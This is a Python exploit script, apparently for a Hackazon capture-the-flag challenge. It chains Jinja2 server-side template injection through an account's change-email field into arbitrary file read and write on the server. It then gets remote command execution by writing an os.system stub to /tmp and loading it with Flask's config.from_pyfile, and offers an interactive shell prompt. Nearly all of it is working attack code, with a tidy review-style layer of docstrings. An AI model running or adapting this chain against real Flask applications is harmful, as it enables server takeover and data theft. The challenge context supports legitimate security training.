Cyberhack script for LaaS
import html
import requests
from bs4 import BeautifulSoup
import random
import base64
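class lass(object):
    """Exploit client for the Hackazon "LaaS" challenge at ``base_url``.

    The challenge renders the account's e-mail address through a server-side
    template, so every primitive here follows one pattern: register a
    throwaway account (``trySignup``), submit a ``{{ ... }}`` expression as the
    new e-mail (``changeMail``), then read the rendered result back from
    ``/private`` (``readResult``).

    Primitives, least to most capable:

    * ``readfile`` / ``writefile`` - file access through
      ``''.__class__.__mro__[2].__subclasses__()[FILE_SUBCLASS_INDEX]``, which
      is assumed to resolve to the ``file`` type on the target interpreter.
      That index is specific to the target's interpreter build; if the target
      changes, re-enumerate ``__subclasses__()`` and adjust the constant.
    * ``execute`` - writes a one-line Python module under ``/tmp``, loads it
      with Flask's ``config.from_pyfile`` (which exec()s it in the server
      process) and reads the captured command output back.

    Filenames, content and commands are escaped before being spliced into the
    injected expression (see ``_quote``); the original concatenation broke on
    any quote or backslash.  Use only against a target you are authorised to
    test.
    """

    # Challenge base URL; url() appends the path given to it.
    base_url = "https://portal.hackazon.org/challenge/0532914ef2f52f529a30a27947651f30"
    # Position in __subclasses__() that resolves to the file type on the target
    # (empirical; interpreter-build specific).
    FILE_SUBCLASS_INDEX = 40
    # Password set at registration and re-sent with every profile change.
    password = "MyPassword1"
    # Per-request timeout in seconds; None keeps requests' default (no timeout).
    timeout = None

    def __init__(self, timeout=None):
        """Create a fresh session.  *timeout* (seconds) bounds every request."""
        self.s = requests.session()
        self.timeout = timeout

    def _get(self, url):
        """GET *url* with the session cookie jar and the configured timeout."""
        return self.s.get(url, timeout=self.timeout)

    def _post(self, url, data):
        """POST form *data* to *url* with the session cookie jar and timeout."""
        return self.s.post(url, data=data, timeout=self.timeout)

    def url(self, path):
        """Return the absolute challenge URL for *path* (e.g. ``/private``)."""
        return self.base_url + path

    def getToken(self, url):
        """Fetch *url* and return the value of its ``csrf_token`` hidden input.

        Raises ValueError when the page has no such input (session lost or
        page layout changed) instead of the bare TypeError the old
        ``None["value"]`` produced.
        """
        req = self._get(url)
        bs = BeautifulSoup(req.text, "html.parser")
        field = bs.find("input", {"id": "csrf_token"})
        if field is None:
            raise ValueError("no csrf_token input on %s (not logged in, or layout changed?)" % url)
        return field["value"]

    @staticmethod
    def _quote(text):
        """Escape *text* for use inside a single-quoted template string literal.

        Assumes the target template engine is Jinja2, whose lexer decodes
        backslash escapes in string literals the way Python does.  Without
        this, a ``'`` or ``\\`` in a filename, file content or command breaks
        out of the injected expression and the server returns a template
        error instead of evaluating it.
        """
        return text.replace("\\", "\\\\").replace("'", "\\'")

    @classmethod
    def _file_expr(cls, *args):
        """Template expression that instantiates the file type with *args*."""
        quoted = ", ".join("'" + cls._quote(a) + "'" for a in args)
        return "''.__class__.__mro__[2].__subclasses__()[%d](%s)" % (cls.FILE_SUBCLASS_INDEX, quoted)

    @classmethod
    def readPayload(cls, filename):
        """Template expression whose rendered value is the content of *filename*."""
        return cls._file_expr(filename) + ".read()"

    @classmethod
    def writePayload(cls, filename, content):
        """Template expression that overwrites *filename* with *content*."""
        return cls._file_expr(filename, "w") + ".write('" + cls._quote(content) + "')"

    @staticmethod
    def _exec_stub(cmd, outfile):
        """Python source that runs shell command *cmd* on the target, stdout into *outfile*.

        The module is later loaded with ``config.from_pyfile``, which exec()s
        it.  ``repr`` produces a valid Python literal for any command, so only
        the surrounding template string literal still needs ``_quote``.
        """
        return "import os; os.system(%r)" % (cmd + " > " + outfile)

    def readfile(self, filename):
        """Inject an expression that reads *filename*; call readResult() to fetch it."""
        self.changeMail(self.readPayload(filename))

    def writefile(self, filename, content):
        """Inject an expression that writes *content* to *filename* on the target."""
        self.changeMail(self.writePayload(filename, content))

    def execute(self, cmd):
        """Run shell command *cmd* on the target and print its output.

        Steps, each an e-mail change followed by a read-back:
          1. write ``/tmp/pwnasd.py`` containing the ``os.system`` stub;
          2. read it back (sanity check that the write landed);
          3. load it with ``config.from_pyfile`` - the stub executes and
             redirects the command's stdout into ``/tmp/pwnasd``;
          4. read ``/tmp/pwnasd`` and print it.
        Both paths are fixed and live in the shared ``/tmp`` of the target, so
        any other user on that host can read or pre-create them.
        """
        filenamePy = "/tmp/pwnasd.py"
        filenameTxt = "/tmp/pwnasd"
        self.writefile(filenamePy, self._exec_stub(cmd, filenameTxt))
        self.readResult()
        self.readfile(filenamePy)
        self.readResult()
        # Flask's config.from_pyfile exec()s the module inside the server process.
        self.changeMail("config.from_pyfile('" + self._quote(filenamePy) + "')")
        self.readfile(filenameTxt)
        self.readResult()

    def trySignup(self):
        """Register a fresh random account and keep its session cookie.

        Exits the process with status 1 when the response does not confirm a
        sign-in, since nothing else works without a session.  ``random`` is
        only used here to make the account name unique, not for any secret.
        """
        # NOTE(review): internal address submitted as the post-login redirect;
        # presumably left from a redirect/SSRF probe - registration does not
        # appear to depend on it.
        n = "http://10.10.0.1:38194/challenge/c8eaa319591b511c5b58c26c4dbb36e5/private"
        data = {
            "username": str(random.randint(0, 99999)) + "username",
            "email": str(random.randint(0, 99999)) + "secret@email.com",
            "password": self.password,
            "csrf_token": "",
            "next": n,
            "reg_next": n,
            # NOTE(review): 1200-char invite token; why this value is accepted
            # is not visible here - confirm against the registration form.
            "invite_token": "123456" * 200,
        }
        url = self.url("/user/register")
        data["csrf_token"] = self.getToken(url)
        req = self._post(url, data)
        if "You have signed in successfully" not in req.text:
            print("Failed to signup")
            raise SystemExit(1)

    def changeMail(self, payload):
        """Submit *payload* as a ``{{ ... }}`` expression through the change-e-mail form.

        The ``@mailNNNN.dk`` suffix (random NNNN) keeps the value shaped like
        an address and makes every submission distinct.  Exits with status 1
        if the server does not confirm the change.
        """
        print(payload)
        data = {
            "csrf_token": "",
            "next": "",
            "old_password": self.password,
            "new_email": "{{ " + payload + " }}@mail" + str(random.randint(0, 9999)) + ".dk",
        }
        url = self.url("/user/change-email")
        data["csrf_token"] = self.getToken(url)
        req = self._post(url, data)
        if "has been changed successfully" not in req.text:
            print("Failed to inject payload")
            raise SystemExit(1)

    @classmethod
    def extractResult(cls, page):
        """Pull the rendered payload output out of the ``/private`` page HTML.

        The page echoes the address as ``your address (<output>@mailNNNN.dk``;
        the text before the first ``@mail`` and after the marker is the
        output, returned HTML-unescaped.  Returns None when the marker is
        absent (session expired, or the injection did not render).
        """
        head = page.split("@mail")[0]
        marker = "your address ("
        if marker not in head:
            return None
        return html.unescape(head.split(marker)[1])

    def readResult(self):
        """Fetch ``/private``, dump the raw page, then print and return the decoded output.

        Raises ValueError when the expected marker is missing, rather than
        the IndexError the unchecked split used to raise.
        """
        req = self._get(self.url("/private"))
        print(req.text)
        result = self.extractResult(req.text)
        if result is None:
            raise ValueError("payload output marker not found in /private response")
        print(result)
        return result

    def changePassword(self):
        """Submit a template expression through the change-password form and dump the reply.

        Exploratory helper, not used by execute(): it checks whether the
        password field is rendered like the e-mail field, printing the CSRF
        token, the status code and the ``main-div`` slice of the response.
        Earlier variants tried SQL-injection strings in the ``next`` field and
        inside the CSRF token; they were not part of the working chain and
        are not kept here.
        """
        data = {
            "csrf_token": "",
            "old_password": self.password,
            "new_password": "{{ PWD }}",
        }
        url = self.url("/user/change-password")
        token = self.getToken(url)
        data["csrf_token"] = token
        print(token)
        req = self._post(url, data)
        print("Changing pwd: ", req.status_code)
        print("has been changed successfully" in req.text)
        res = req.text.split('div id="main-div"')[1]
        res = res.split("Welcome")[0]
        print(res.replace("\n\r\n", "\n"))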
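import sys


def main():
    """Register a throwaway account, then run an interactive command loop.

    Every non-empty line typed at the prompt is executed on the target via
    lass.execute(); EOF (Ctrl-D) or Ctrl-C ends the session cleanly instead
    of the traceback the unguarded input() produced.
    """
    x = lass()
    x.trySignup()
    while True:
        try:
            cmd = input("SHELL$ ")
        except (EOFError, KeyboardInterrupt):
            print()
            break
        if not cmd.strip():
            # Nothing to run; skip the four round trips execute() would make.
            continue
        x.execute(cmd)


# Manual one-off usage, kept for reference (x = lass(); x.trySignup() first):
#   x.writefile("/tmp/test", "test"); x.readResult()
#   x.readfile("/tmp/test"); x.readResult()
#   x.changeMail(sys.argv[1]); x.readResult()   # inject an arbitrary expression


if __name__ == "__main__":
    main()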